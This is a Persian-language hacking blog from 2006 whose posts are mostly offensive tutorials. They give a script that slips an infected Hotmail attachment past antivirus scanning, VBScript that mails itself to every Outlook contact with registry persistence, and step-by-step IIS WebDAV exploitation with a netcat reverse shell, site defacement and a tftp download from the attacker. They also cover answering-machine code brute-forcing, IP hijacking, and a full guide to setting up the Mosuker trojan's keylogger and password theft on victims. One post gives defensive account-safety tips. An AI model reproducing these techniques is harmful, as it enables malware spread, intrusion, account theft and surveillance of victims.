گول زدن آنتي ويروس ايميل براي فرستادن فایل هک

گول زدن آنتي ويروس ايميل براي فرستادن فایل هک

 

مطلب زير رو امروز از آستالاويستا خوندم
چون جالب به نظرم اومد گفتم اينجا خلاصه شو بگم:
ايراد از اينجا ناشی ميشه كه تو آدرس-بار به آنتی ويروس اشاره ميشه.
برای اينكار نياز به دو فايل دارين كه دوميش آلوده است.
كد زير رو هم برا فايل اولی بنويسيد

<html>
<script>
str1=document.URL
str2=str1.slice(55,110)
splitString = str2.split("&")
str3=splitString[0]+"&"+splitString[1]
window.open('http://by7fd.bay7.hotmail.msn.com/cgi-bin/getmsg?curmbox=F000000001&a='+str3+'&mimepart=4')
SPAN <>SPAN>script>
SPAN <>SPAN>html>

اين كد باعث ميشه شما آنتيويروس رو دور بزنيد
وقتی طرف شما فايل اولی رو ميخواد دانلود كنه آنتی ويروس هات ميل اونو چك ميكنه.خوب بعد ميخواد دانلود بشه! ولی بصورت online باز ميشه و ession ID and message ID رو گير مياره. بعد پنجره جديدی باز ميشه كه به فايل دوم اشاره ميكنه ولی فايل دوم بدون چك شدن با آنتی ويروس شروع به دانلود ميشه. طرف شما می بينه فايل بدون اخطار آنتی ويروس از هات ميل داره دانلود ميشه.
اگه ظاهر فايل دوم هم شبيه فابل اولی باشه كمتر كسی ممكنه شك كنه

---------------------------------------------------------------------------------------------------

اموزش : برنامه خود را از طریق ادرس ایمیل دیگران در تمام جهان پخش کنید ( بدرد ویروس نو

شما با استفاده از اتلوک اکسپرس می تونید برنامه به ویژه ویروس خودتون رو در سرار جهان پخش کنید این روشی که من الان می نویسم یکی از روش های پخش ویروس هاست ولی خوب با استفاده از این روش می تونید برنامه یا هرچی رو در تمام جهان پخش کنید

Code:

Set OutlookApp = CreateObject("Outlook.Application")
If Not OutlookApp = "" Then
For Each ContactSwitch In OutlookApp.GetNameSpace("MAPI").AddressLists
For UserGroup = 1 To ContactSwitch.AddressEntries.Count
Set OutlookEmail = OutlookApp.CreateItem(0)
OutlookEmail.Recipients.Add ContactSwitch.AddressEntries(UserGroup)
OutlookEmail.Subject = "Check this out!"
OutlookEmail.Body = "Look at the file in the attachments, It's great! :P"
OutlookEmail.Attachments.Add WScript.ScriptFullName
OutlookEmail.DeleteAfterSubmit = True
OutlookEmail.Send
Next
Next
End If


OutlookEmail.Subject = "Check this out!"
OutlookEmail.Body = "Look at the file in the attachments, It's great! :P"
OutlookEmail.Attachments.Add WScript.ScriptFullName

 

 اگه متوجه نشدید ناراحت نشید چون قرار نیست که همه متوجه بشن اگه این طوری باشه همه ملت ویروس نویس می شن فقط اونهای که تو این کار (ویروس نویسی ) هستن می دونن این کد چه ارزشی داره . در ضمن تا یادم نرفته اقا من ویروس نویس نیستم ( نکنه یه دفعه برام ویروس بفرستن حالم رو بگیرن ) من برای تفریح با این ویروس ها ور می رفتم ازشون یه چیز های یاد گرفتم
خوب چون این تاپیک به درد تازه کار ها هم خوره یه اموزش مقدماتی می دم که برای ویروس نویسی هم به کار می یاد
1)اجرای برنامه در استارتاپ:
با استفاده از کد زیر می تونید برنامه ای که می نویسید تو استارتاپ قرار بدید

 

Code:

Set Reg = CreateObject("wscript.shell")
Reg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run  \" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"
+ نوشته شده در 2006/8/20 ساعت 1:32 توسط محمد ملکشاهی  | 

آموزش جلوگيري از هك شدن در ياهو مسنجر

بابا هي بگين هكرا بدن شما بايد جلوشونو بگيريد:::

با رعايت نكات زير امكان بسته شدن يا بدست اوردن پسورد در ياهو رو به حداقل برسونيد:

1. اسنكه پسورد ياهو هك شه ديگه دورانش گذشته اونقدر ياهو امنيتش رو بالا برده يه ديگه بايد خواب بدست اوردن پسورد رو فقط ببينيم اگرم الان ميگن فلاني پسورد يكي رو بدست اورده فقط به علت بي احتياتي خودشه كه دلايلش رو پايين نوشتم

2.اقا جان وقتي كارتون با مسنجر يا mail box تموم ميشه حتمآ sign out كنيد اين موضوع خيلي مهمه در مبحث استفاده از ردپاها يا همون cookies ها روشي هست كه هر چند تعداد خيلي كمي ميتونن ازش استفاده كنن ولي ميتونن از همين ردپا ها استفاده كنن و ايميل هاي شما رو بخونن ولي با اين روش نمي تونن پسورد بدست بيارن

3.حتمآ از پسورد هاي امن استفاده كنيد مثلآ ورندارين شماره تلفن خونتون رو بزارين پسور كد يا اسم دوست دختر يا دوست پسرتون رو سعي كنيد از كاركترهايي مثل @ در پسورد خودتون استفاده كنيد اين موضوع به خاطر اينه كه با پسورد ياب ها نتونن كلمه عبورتون رو بدست بيارن هر چند باز بخاطر بالا رفتن امنيت ياهو اين كارم تخته شده!

4.اقا يارو ميگه ميخواد واست فايل بفرسته مثلا عكس خودشو شما به سه شماره ميگريد بعدم اجرا ميكنيد اخر سرم ميگيد error داد يارو هم ميگه اشكال از سيستم خودت شما ميگين بيخيال حالا بگو منو چندتا دوست داري!!!!!!!!!

5.وقتي كه فايلي فرستاده ميشه به پسوند اون دقت كنيد ديگه تابلو كه پسوند عكس چيزايي مثل gif/jpg و.... هست و فايل هاي اجرايي exe/com/bat كه اكثرا تروجان ها در قالب exe فرستاده ميشه

6. بعضي ها ميان زرنگي كنن ور ميدارن بعد از پسوند فايل چند تا space ميزنند همون طوري كه ميدونيد در ويندوز نام فايل ها تا 11 كاراكتر نشون داده ميشه و اگه بيشتر بشه ....... ميزاره به اينم هواستون باشه كه طرف كـلـك رشــتـــــــي نـزنـه !!!!!

7.اين ديگه واقعا دورانش گذشته اونم استفاده از fake login هستش هر چند الان اين راه بيشترين قرباني رو ميده هواستون باشه تو هر صفحه كه ميريد تا لاگين ديديد ور ندارين پسوردتون رو بديد چون با اينكار پسورد خودتون رو دو دستي تقديم به اون كسي كردين كه اين صفحه رو ساخته

8. يه كلك رشتي كه كمتر به فكر كسي ميرسه گذاشتن يك تروجان به جاي فونت مخصوص يك سايته كه روشي كه هنوز خيلي لو نرفته فرض كنيد وارد يك صفحه ميشيد كه اصلا نميتونكد فونتشو بخونيد حالا كه لينك پايين گذاشته كه گفته اقا جان اين فايل رو دريافت كنيد بعد از نصب ميتونيد متن صفحه رو بخونيد حالا حساب كنيد به جاي فايل مربوط به فونت يك تروجان باشه!

9.يه نكته اي هست اونم در مورد بسته شدن مسنجره ببينيد يكي از دلايل اصلي كه شما تو ايميل ميتونيد بريد ولي مسنجرتون باز نميشه استفاده از بوترهاست كه اينم بر ميگرده به سيستم امنيتي جديد ياهو كه ممكنه مسنجر شما رو براي چند روز ببنده ميگن هيچ راهي نيست كه خود ادم درستش كنه و بايد منتظر موند تا ياهو دلش به رحم بياد و مسنجر رو باز كنه ولي باز ميگن در اين حال استفاده از yahoo messenger 5.0 تونسته به يه عده ادم كمك كنه

10. اگر نه تو مسنجر ميريد نه تو ياهو ميل و اون پيام گند بسته شدن ID رو ميدند كه متاسفانه راهي براي درست كردنش نيست به جز اينكه زنگ بزنيد ياهو دو ساعت صحبت كنيد تا راضي بشن كه خوب اين موضوع واسه كسايي كه تو امرييكان مثلآ برن دم در شركت ياهو چهار تا داد بزنن يا چرخ ماشين اون دوتايي كه ياهو رو ساختن پنچر كنن يا مثلا يه هزاري بزارن تو جيب يارو مثلآ بگن ما فاميل اقاي پشكل پناهيان هستيم شايد يه كاري براتون كردن ولي كلآ اگه اينجوري شد ديگه بايد به طور كامل و براي هميشه بيخيال id تون بشين

11.يه سري password sender هست مثل k2ps كه تمام پسوردهاي كامپيوتر شما مثل اشتراك يا ياهو رو براي طرف ميفرسته كه باز اينم بايد فايل مربوطه رو سيستم قرباني اجرا بشه خوب اگه طرف هواسش باشه چي رو داره اجرا ميكنه مشكلي براش پيش نمياد

12. شايد مهمترين نكته كه خيلي ها بهش تاكيد دارن استفاده از يك ديوار اتش مطمئن و همچنين يك انتي ويروس قوي هست كه هر دويه اين برنامه ها هميشه بايد بروز باشن مثلآ براي ديوار اتش ميتونين از zone alarm ?ا black ice استفاده كنيد انتي ويروسم norton , pc-cillin , mcafee پيشنهاد ميشه

13. هيچ وقت cookies ها? اينترنت اكسپلور رو نگه نداريد و هميشه پاك كنيد براي اين كار در از منوهاي بالا كه صفحه گزينه Tools رو انتخاب كنيد و بعد delete cookies رو بزنيد ?ا كلا از setting گزينه never رو بزنيد تا ديگه ردپايي از شما باقي نمونه

+ نوشته شده در 2006/8/20 ساعت 1:19 توسط محمد ملکشاهی  | 

چگونه IP خود را عوض کنیم

الف) درباره
در اين مقاله آموزش ميديم چه جوري IP خودتون را با يه IP ديگه از همون Range عوض كنين. هر موقع كه به اينترنت وصل ميشين، پروتكل DHCP به شما يه IP تخصيص ميده. عوض كردن اين IP كار چندان سختي نيست و البته ميتونه مفيد هم باشه! موقعي كه شما تحت حمله DDoS هستين يا وقتي كه ميخواين تمامي درخواستها به يه وب سرور رو به طرف خودتون Redirect كنين يا فرضاً وقتي كه IP شما بسته شده و ميخواين به جاي اون از يه IP ديگه در Range خودتون استفاده كنين و يا ... به تغيير دادن IP احتياج پيدا ميكنين.
ب) اطلاعات مورد نياز
قبل از اينكه شما بتونين IP خودتون رو عوض كنين، بايد يه سري اطلاعات جمع كنين. اين اطلاعات عبارتند از : محدوده IP شما، Subnet Mask، مدخل (Gateway) پيش گزيده، سرور DHCP و سرورهاي DNS
1. به دست اوردن محدوده IP : بدست اوردن IP Range اصلاً سخت نيست! فرض كنيد IP شما 24.193.110.255 باشه. شما ميتونين به طور مشخص از محدوده زير براي IP جديد خودتون انتخاب كنين :
24.193.110.1 < [آي پي جديد] < 24.193.110.255         بدست آوردن ip  رو قبلآ گفتيم
2. به دست اوردن Subnet Mask، مدخل، سرور DHCP و DNS : به دست اوردن اينها هم ساده‌س! يه خط فرمان DOS باز كنين و توش تايپ كنين ipconfig /all شما حالا بايد بتونين يه چيزي شبيه به اين ببينين :

Host Name . . . . . . . . . . . . : My Computer Name Here
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : xxxx.xx.x
Description . . . . . . . . . . . : NETGEAR FA310TX Fast Ethernet Adapter (NGRPCI)
Physical Address. . . . . . . . . : XX-XX-XX-XX-XX-XX
Dhcp Enabled. . . . . . . . . . . : Yes
Autoconfiguration Enabled . . . . : Yes
IP Address. . . . . . . . . . . . : 24.xxx.xxx.xx
Subnet Mask . . . . . . . . . . . : 255.255.240.0
Default Gateway . . . . . . . . . : 24.xxx.xxx.x
DHCP Server . . . . . . . . . . . : 24.xx.xxx.xx
DNS Servers . . . . . . . . . . . : 24.xx.xxx.xxx
24.xx.xxx.xx
24.xx.xxx.xxx
Lease Obtained. . . . . . . . . . : Monday, January 20, 2003 4:44:08 PM
Lease Expires . . . . . . . . . . : Tuesday, January 21, 2003 3:43:16 AM

خوب! اين تموم اطلاعاتي بود كه نياز داشتين. بهتره اون خط فرمان DOS رو باز نگه دارين يا اينكه اطلاعاتش رو كپي كنين. (براي كپي كردن، متن رو انتخاب كنين و يكبار روش كليك كنين)
3. عوض كردن IP : براي عوض كردن IP خودتون، اول بايد يه IP انتخاب كنين (يادتون نره كه تو محدوده باشه!) به نظر من بهتره اول مطمئن بشين كه اين IP جديد مُرده! (همون Dead) بلدين كه چطوري؟ اين IP رو پينگ كنين و اگه Time Out داد مطمئن باشين كه ميشه ازش استفاده كرد. حالا در Control Panel بريد به Network Connections و روي Connection فعال دابل كليك ?نين. دكمه Properties رو بزنين و بريد به برگه Networking. حالا (Internet Protocol (TCP/IP رو انتخاب كنين و دكمه Properties رو بزنين. در پنجره جديدي كه باز شده، قسمتهاي Use the following IP address و Use the following DNS server addresses رو با توجه به اطلاعاتي كه در قسمت 2 به دست اوردين پر كنين. در قسمت اول، IP اي رو كه انتخاب كرديد (IP جديد) و در قسمت دوم، آدرس DNS Server رو وارد كنين. حالا تغييرات رو ثبت و تأييد كنين. فقط يه تست كوچيك مونده! در مرورگر خودتون، آدرس يه سايت رو وارد كنين. اگه صفحه سايت اومد، بدونين كه با IP جديد دارين كار ميكنين. براي اينكه مطمئن بشين كه تغييرات اعمال شدن، دوباره در خط فرمان DOS تايپ كنين ip config /all اگه پس از اجراي اين دستور، IP و DNS جديد رو ديديد، بدونين كه درست عمل كرديد.
ج) حملات DDoS و DoS

اگه فايروال شما نشون بده كه شما تحت يه حمله DDoS هستين، اين معمولاً موقعيه كه شما داريد از طرف يك يا چند تا IP از طريق UDP مورد حمله قرار ميگيرين. در اين حالت شما ميتونين با استفاده از روش "عوض كردن IP" كه در بالا توضيح داده شد، از خودتون محافظت كنين.

د) وب سرورها و سرويس هاي ديگه

اگه شما ميدونين كه در محدوده IP شما يه وب سرور قرار داره، ميتونين IP اون رو بدزدين و خودتون يه وب سرور بشين! به اين ترتيب هر درخواست DNS اي كه براي اون IP ارسال بشه، به شما Redirect ميشه و به جاي اون سايت، صفحه شما نشون داده ميشه!

البته دزديدن IP معمولاً كار درستي نيست! چون ممكنه به بستن حساب شما منجر بشه!

+ نوشته شده در 2006/8/20 ساعت 1:18 توسط محمد ملکشاهی  | 

نفوذ به مـنـشـي هاي تـلـفـنــي

نفوذ به مـنـشـي هاي تـلـفـنــي

اين سيستم حتي سيستم هاي گويا مثل ??? رو هم ميگن  حالا يارو ميگه چقدر حال ميده ??? رو دستكاري كنم ولي بدون كه اين كارا علكي نيست و من هم راه بدون اشكال رو جلوتون نميذارم بگم بفرما براي هر كاري آدم بايد علاقه نشون بده بره دنبالش تا ياد بگيره حرفتم بالا نياد

Answer machine

(a-s يعني همون Answer machine ) سيستم هاي تلفني هستند كه بعد از فعال شدن به خط گوش داده و بعد از يك call و فراخواني و بعد از شرايطي خاص شروع به كار ميكنند كه اون شرايط در مورد بحث ما a-s هاي خانگي ميشه نه ??? (اونو نميگم علكي هم تو قسمت نظرات نگيد بگو بگو ) روشن بودن و فعال بودن a-s و تنظيمات داخلي تلفن كه مثلا سر زنگ دوم به كار ميوفته و... و بعد از به كار افتادن حالا دستور عملي كه از پيش طراحي شده انجام ميدن مثلا (در خارج از بحث ) شايد در فيلمها ديده باشيد كه يارو مياد با يك تلفن به جاي مورد نظر بمب عمل كرده و منفجر ميشه كه در اين نوع a-s تعريف شده بعد از برقراري ارتباط چاشني عمل كنه و در a-s خانگي هم دستورات زيادي تعريف ميشه اما مهم تر از همه اين  تاست :

1. آمادگي براي پخش صداي مشي يا به اصطلاح greeting_message

2. گرفتن data هاي لازم براي پخش caller id

3. گوش دادن براي Tone (امواج مخابرتي كه مانند كد عمل ميكنند ) هاي خاص كه اگر درست وارد شود يه سري كارهاي ديگه انجام ميده .

? رو همه a-s ها بايد داشته باشند و ? رو تلفن هايي كه شمار ميندازن يا به قول معروف مزاحم گير دارند و ? هم در اكثر a-s ها هست كه به صاحب a-s اجازه ميده پيغام هاي ضبط شده رو از دور يعني از پشت خط گوش بده كه البته بايد كد مورد نظر رو وارد كنه (Tone ها ) ?ه حالا بحث ما در مورد نفوذ به a-s هايي هست كه ? رو دارند كه الان تمام تلفنهاي بيسيم يا فاكسها اين رو دارند .

TONE ها يا كدهاي مخابراتي (از بس نوشتم به خدا خسته شدم)

حالا در مورد همون ? بيشتر بحث ميكنيم در remote_controling طرف يه كد براي خودش در نظر ميگيره كه بتونه از اون استفاده كنه و فرد ديگه نتونه وارد a-s ايشون بشه.

قدم اول شناسايي a-s و مدل آن

شما اگه دقت كرده باشيد با وجود a-s هاي متعدد در بازار اكثرا يك مدل و يك سيستم كاري دارند و ? حالت بيشتر نيستند :

1. آنهايي كه با نوار كار ميكنند

2.آنهايي كه با ic كار ميكنند و تا قبل از 2001 هستند

3. آنهايي كه با ic كار ميكنند ولي طرح جديد كه امنيت بيشتر داره

روش نفوذ

ما ? روش نفوذ براي بدست آوردن password داريم:

1. مهندسي اجتماعي

2.crack روش ما

3.exploit و هك (در اينجا ميشه crash , phreak )

و اما كرك

خب اين كد يا تن هايي كه به شما اجازه ميده به a-s نفوذ كنيد شامل ? جايگشت بيشتر نيست يعني اگه شما ??? حالت رو چك كنيد يكي از اين ??? حالت درست در مياد.

ارتباط آزمايشي

شما بايد قبل از نفوذ كاملا به سيستم آشنا باشيد يعني بدوني بعد از وارد شدن كد چه عكس العملي نشون ميده مثلا در پانا سونيك مدل قبل از ???? بعد از وارد كردن كد صحيح يك بوق كوچك ميزنه كه يعني وصل شدين .

امتحان آغاز كرك

حالا بعد از انجام كارهاي بالا شما طرف رو ميگيريد و ميبينيد كه greeting message پخش ميشه و بعد يه بوق ميزنه كه يعني ميتونين پيغام بزارين (البته با زدن * ) و حالا دستي شماره ?? تا ?? رو چك ميكنيم و ميبينيم كه اون عكس العمل كه بايد نشون بده كه در ? فهميديم نشون ميده !

هميشه براي اين كار اول رمز ?? يا ?? رو امتحانكنيد چون شركت سازنده اينها رو ميزاره و مردم هم عوض نميكنند.

 بريد باهاش حال كنيد....
+ نوشته شده در 2006/8/20 ساعت 1:14 توسط محمد ملکشاهی  | 

نحوه ي هك كردن سرورهاي iisرا بر اساس آسيب پذيريهاي موجود

من در اين مقاله سعي دارم نحوه ي هك كردن سرورهاي iisرا بر اساس آسيب پذيريهاي موجود توضيح دهم

1-webdav vulnerablity
اين حفره به خا طر اسيب پذيري ntdll.dll مي باشد
براي اين آسيب پذيري كد هاي متفاوتي نوشته شده است كه من كار كردن با كدهاي آقاي kralorرا ترجيح مي دهم.با استفاده از اين اسب پذيري مي توان از سرور آسيب پذير يك reverse shell گرفت.
حسن كدهاي kralor در اين هست كه سرور آسيب پذير حتي اگر داراي firewallهم باشد ميتوان از آن shellگرفت
چون اين سرور هست كه به شما connect مي شود و
firewall هم چنين اجازه اي را هم معمولا به سرور مي دهد!

2-فايلهاي مورد نياز:
الف-netcat به اختصار nc
ب-wb.exe يا web.exe
نت کت رو ميتونيد از اينجا دانلود کنيد بعدی روهم از اينجا
ftp ) www.alltheweb.com/)
حالا بريم سراغ اصل مطلب ،براي شروع بهتر است هدف خودمان را معلوم كنيم و ip آن را با استفاده از دستور ( ( ping پيدا كنيم(توجه كنيد كه بعد از ping آدرس سايت مربوطه را مي نويسيم)
گام دوم ذخيره كردن فايلهاي wb.exe & nc.exe در شاخه
windows سيستم خودمان مي باشد.
خوب حالا command prompt ويندوز را باز مي كنيم و netcat را در حالت شنود قرار ميدهيم(اگر نحوه ي كار با netcat را بلد نيستين بي خيال هك بشين!)به طريقه زير:
در command prompt دستور زير را تا يپ كنيد!
nc -lvp 6666
به اين ترتيب netcat بر روي پورت 6666 در حالت شنود قرار ميگيرد.
بعد يه command prompt ديگه باز ميكنيم ودستور زير در آن تايپ مي كنيم:
wb يا web (بستگي به كدي دار دكه دانلود كرده ايد)
wb.exe <victemip> <your ip> <6666>
مثلاwb.exe 192.168.0.1 192.168.0.15 6666
حال اگه خوش شانس باشيد ! در netcat( كه به حالت شنود قرار داده بودين) با سرور روي پورت 6666 يك ارتباطي بر قرار مي شود و سرور خط فرمان خود رادو
دستي تقديمتان مي كند!
و انچه كه خواهيد ديد يه چيزي شبيه

C:\winnt\system32>
خواهد بود. حالا هر بلايي خواستين ميتونيد بر سر سرور بياريد، كه مهمترين شان deface كردن سايت هست كه من قصد دارم اون را هم بهتون بگم(ok!!!):

از داخل خط فرمان فوق به داخلwwwroot\ inetpupبريد (cd كنيد).
حالا به دنبال فا يلهايي كه پسوند html دارند بگرديد
(اين كار با dir *.html) هم ميشه انجام داد.
معمولا ان چيزي كه ما دنبالش هستيم به فرم index.html يا index.asp مي باشد
قبل از هر كاري و اسه admin بد بخت يه كپي از سايتش تهيه كنيد و تو سرور قرار دهيد(اين مرحله اختياري هست!!!!!!!!!!!!!هاها) به صورت زير:
در داخل wwwroot بنويسيد
copy index.html index2.html
بعد
Echo defaced by taghy index.html
حالا tftp را تو كامپيوتر خودتان فعال كنيد(حتما خودتان بلديد ! قرار نست كه همه چي را من بهتون بگم!)
بعد در wwwroot دستور زير را صادر ميكنيد:
tftp yourip get taghy.html
حتما يادتون باشه سرور را restart كنيد تا شاهكارتان را ببينيد!
مطمئنم كه شما اين كار رو بلديد ولي محض احتياط
C:\inetpup\wwwroot> iisreset /restart /rebootonerror /timeout:100

+ نوشته شده در 2006/8/20 ساعت 1:12 توسط محمد ملکشاهی  | 

معرفی تروجانMosuker 3.0

معرفی تروجانMosuker 3.0
mosuker مثل اکثر تروجان ها دارای دو بخش اصلی است بخش اول CreateServer هستش که همان جوری که از اسمش پیداست برای ساختن سرور این تروجان میباشد ما اول باید CreateServer رو تنظیم کنیم تا بتونیم برای کامپیوتر قربانی بفرستیم برای شروع کار ابتدا CreateServer رو اجرا کنید یک کادر در وسط صفحه ظاهر میشه که شما باید نوع استفاده از سرور خودتون رو مشخص کنید یعنی اینکه شما تصمیم دارین که سرور رو رو سیستم خودتون تست کنید یا اینکه برای کامپیوتر قربانی بفرستین اگر شما گزینه I want to create a stealth Trojan server رو انتخاب کنید که البته پیش فرض هم همین گزینه هستش به این معناست که قسط دارین تروجان رو برای قربانی بفرستین در پایین کادر هم شما دو انتخاب دارین اولی برای تست رو کامپیوتر خودتون هست که مثلآ ip و port برای شما میاد یا نه یعنی گزینه I want to create visible server for local testing و دومین گزینه هم برای اینه که شما بخواین تو سروری که قبلآ ساختین تغییراتی بدین یعنی گزینه I want to edit an existing server حالا من فرض رو بر این میگذارم که شما میخواین این سرور رو برای قربانی بفرستین پس بدون تغییر تو صفحه ok رو بزنید بعد یک سوال از شما در مورد محل ذخیره سرور و نام اون میپورسه که شما اسمی که میخواین سرور رو با اون نام ساخته بشه وارد میکنید بعد mosuker شروع به ساختن سرور میکنه و بعد از پایان کادر اصلی CreateServer میاد که شما باید اون رو تنظیم کنید

name/port : این بخش برای مشخص کردن نام سرور و شماره پورتی که شما میخواین به کامپیوتر قربانی وصل بشید به طور پیش فرض شما با استفاده از پورت 4588 به کامپیوتر دیگه متصل میشید در قسمت victim name نام قربانی رو میدید که به صورت پیش فرض نام خود mosuker انتخاب شده در قسمت server name و extension شما میتونید نام و پسوندی که سرور شما در پوشه ویندوز قربانی قرار که ساخته بشه رو تغییر بدید
password : همون جوری که از اسم این قسمت مشخصه شما میتونید برای سرور خودتون پسورد بگذارید که دو حالت اینجا وجود داره اولین گزینه یعنی protect server with password برای اینه که وقتی به کامپیوتر قربانی متصل میشید از شما کلمه عبور میخواد که برای وصل شدن حتمآ باید رمز رو وارد کنید گزینه دوم یعنی protect edit server برای اینه که اگه کسی بخواد سرور رو ادیت کنه و توش تغییراتی بده باید کلمه عبور رو وارد کنه
auto start : این قسمت برای اینه که شما مشخص کنید فایل سرور شما تو کدام قسمت ها قرار بگیره مثل رجیستری قربانی بعضی از گزینه ها با رنگ قرمز مشخص شدن که همون طوری که نوشته شده فقط در ویندوز های 95 و 98 و me کارایی داره
notification 1 : شما در این قسمت مشخص میکنید که ip و port قربانی چطور برای شما بیاد اولین گزینه برای کاربران ICQ هستش که میتونن شماره خودشون رو بدن گزینه دوم هم برای کسانی هست که از هات میل استفاده میکنن که فقط کافیه user و پسورد و ایمیل خودشون رو وارد کنن
notification 2 : برای کسایی که میخوان با استفاده CGI ایپی و پورت طرف براشون بیاد
option: این بخش برای تنظیم کردن خصلت های سرور مورد استفاده قرار میگیره به عنوان مثال گزینه deny remove server برای اینه که اگر قربانی بخواد سرور رو پاک کنه در صورتی که این گزینه انتخاب شده باشه نمیتونه اینکار رو بکنه گزینه melt server هم برای اینه که وقتی که سرور رو سیستم قربانی اجرا شد خود به خود از بین بره visible server هم همون جوری که قبلآ اشاره شد برای تست روی کامپیوتر خودمون هستش از گزینه های دیگر میشه به open port only when server is online اشاره کرد که به این معناست که هر وقت کانپیوتر قربانی انلاین بشه شما میتونید از پورت مربوطه استفاده کنید گزینه do not open port before next reboot به این معناست که پورت تا زمانی که سیستم طرف restart نشه مورد استفاده قرار نگیره
Event :شما میتونید تنظیم کنید که کار مشخصی در زمان خاصی انجام بشه مثلآ اگر شما از قسمت choose an event گزینه on dial up connection و از قسمت choose an action گزینه shut down computer رو انتخاب کنید به این معناست که وقتی قربانی اقدام به شماره گیری برای وصل شدن به اینترت میکنه کامپیوترش خود به خود خاموش میشه

Bind files

:اگر شما با تروجان های مختلف کار کرده باشید حتمآ با این قسمت اشنا هستید این بخش برای اینه که شما یک فایل رو به سرور بچسپونید که وقتی طرف فایل رو اجرا کرد فایل دوم هم اجرا بشه مثلآ یک فایل عکس
keylogger : با انتخاب این گزینه یک فایل log از چیزهای که قربانی تایپ کرده ساخته میشه که به طور پیش فرض نام فایل monitor.log هستش قسمت پایین یعنی گزینه enable smart logging هم برای بدست اوردن پسورد یاهو مسنجر یا هات میل طرف هستش که تو همون فایل ذخیره میشه

plug-ins/kill :این تروجان هم مثل ساب سون احتیاج به پلاگین داره که شما میتونید پلاگین مربوطه رو توی سرور قرار بدین که اگه بخواین چند تا پلاگین بگذارید حجم سرورتون زیاد میشه پس بهتره وقتی به سیستم قربانی متصل شدید پلاگین های مربوطه رو اپلود کنید خود mosuker یه تعدادی پلاگین تو پوشه ای به همین نام داره اگه میخواین پلاگین های بیشتری داشته باشید میتونید از سایت www.mosuker.de تعدادی دانلود کنید گزینه دیگه که توی این قسمت هستش kill running system process هستش که حتمآ علامت بزنید که اگر طرف از انتی ویروس خاصی استفاده میکنه سرور اونو از کار میندازه
fake error : این قسمت هم برای ساختن یک پیغام در هنگام اجرای سرور هستش که شما میتونید متن و ایکن دلخواه رو بگذارید
file properties :این قسمت هم مشخصات سرور شما رو نشون میده که میتونین تغیر بدین و یک سری مشخصات جعلی رو برای فایل شما انتخاب کرده که این سرور رو یک فایل ساخته شده توسط Microsoft Windows Corporation نشان میده
Icon :اینقسمت برای انتخاب یک ایکن برای سرور شما هستش که خود mosuker یه تعداد ایکون در اختیار شما قرار میده پس از انتخاب ایکون سرور شما برای ارسال امادست فقط کافیه که اونو save کنید

اموزش کار با mosuker
خوب وقتی که سرور رو برای قربانی فرستادید و ip و port برای شما اومد شما وارد خود MoSucker میشید تا کارایی که میخواین رو انجام بدین اول شما باید به سیستم قربانی وصل بشید برای اینکار MoSucker رو اجرا کنید و در بالای صفحه ip و پورت رو وارد کنید و روی connect کلیک کنید

misc stuff :این بخش برای اعمال تغییرات در سرور هستش که دارای چند بخش هست 1.server option : با استفاده از این قسمت شما میتونید سرور رو از سیستم قربانی پاک یا restart کنید 2.plug-in:لیستی از پلاگین های موجود رو به شما نشان میده 3.edit server: با استفاده از این بخش شما میتونید یک سری تغییرات رو سرور بدید به عنوان مثال ICQ که دادین رو عوض کنید یا پورت رو تغییر بدید و یا پسورد رو عوض کنید 4.port redirect : شما میتونید یک پورت خاص رو اضافه کنید 5.chat with victim: شما با استفاده از این قسمت میتونید با قربانی چت کنید

information : این قسمت یک سری اطلاعات از سیستم قربانی به شما میده مثلآ نوع ویندوز و یا مشخصات درایو های طرف
file related : با استفاده از این قسمت شما میتونید کنترل فایل ها رو در اختیار بگیرید به عنوان مثال با استفاده از گزینه file manager شما میتونید به قسمت های مختلف سیستم قربانی برید و یک فایل یا پوشه رو اضافه یا حذف کنید همچنین میتونید فایل های دلخواه رو از روی سیتم طرف دانلود کنید یا پس زمینه ویندوز رو عوض کنید یکی دیگر از بخش های این قسمت find files هست که شما میتونید فایل های خاصی رو در سیستم قربانی جستجو کنید
system : این بخش برای دستکاری سیستم قربانی هست به عنوان نمونه از قسمت windows manger شما میتونید با پنجره های سیستم طرف بازی کنید مثلا همه پنجره ها رو minimize کنید با استفاده از گزینه process manger شما میتونید لیستی از برنامه های که در حال اجرا هستند رو ببینید و در صورت تمایل اون هارو از کار بندازید با استفاده از گزینه register editor شما میتونید در رجیستری طرف تغییراتی بدید
spy related : این قسمت برای بدست اوردن پسوردهای سیتم قربانی و دیدن مطالبی که تایپ میکنه به کار میره شما با استفاده از گزینه key logger و زدن گزینه start logger میتونید ببینید که طرف چی داره تایپ میکنه گزینه دیگه این بخش screen shot هستش که شما میتونید یک عکس از صفحه نمایش قربانی بگیرید گزینه clipboard هم برای دیدن حافظه موقت سیستم قربانی بکار میره و اخرین گزیه یعنی password هم لیستی از پسورد های ذخیره شده در سیستم رو به ما نشان میده
fun stuff : دو گزینه به این نام وجود داره که با fun stuff1 و fun stuff2 از هم تفکیک میشن که کار با این قسمت بسیار سادست به عنوان مثال با استفاده از lamer stuff شما میتونید سی دی رم طرف رو باز یا بسته کنید یا گزینه message box یک پیغام رو روی صفحه قربانی نشون میده یا با استفاده از گزینه mouse fun شما میتونید جای کلید های ماوس طرف رو عوض کنید یک گزینه دیگر هم به نام system color هست که شما میتونید رنگ پس زمینه ویندوز رو عوض کنید گزینه flip screen برای اینه که شما میتونید با تصویر مانیتور قربانی بازی کنید مثلآ تصویر رو وایسونین یا به صورت عمودی و افقی تغییرش بدین با استفاده از گزینه set resolution شما قادر خواهید بود رنگبندی تصویر کامپیوتر قربانی رو عوض کنید
live captor : شما میتونید با استفاده از این قسمت صفحه مانیتور قربانی رو ببینید همانند یک فیلم البته با کیفیت و سرعت پایین خوب یک سری قسمت دیگه هم در mosuker وجود داره که برای کار با این قسمت ها نیاز به پلاگین دارید برای این کار به قسمت پلاگین برید و هر کودم رو که میخواین روش دبل کلیک کنید تا در صورت نیاز اول رو سیستم طرف اپلود بشه و بعد کادر مربوط به پلاگین باز میشه و شما میتونید از این قسمت استفاده کنید برای دانلود این تروجان به این ادرس بروید http://home.pages.at/mosu123/mosucker_3.0a.zip
پلاگین Fake Login : برای بدست اوردن پسورد یاهو مسنجر و هات میل قربانی شما میتونید از این پلاگین استفاده کنید
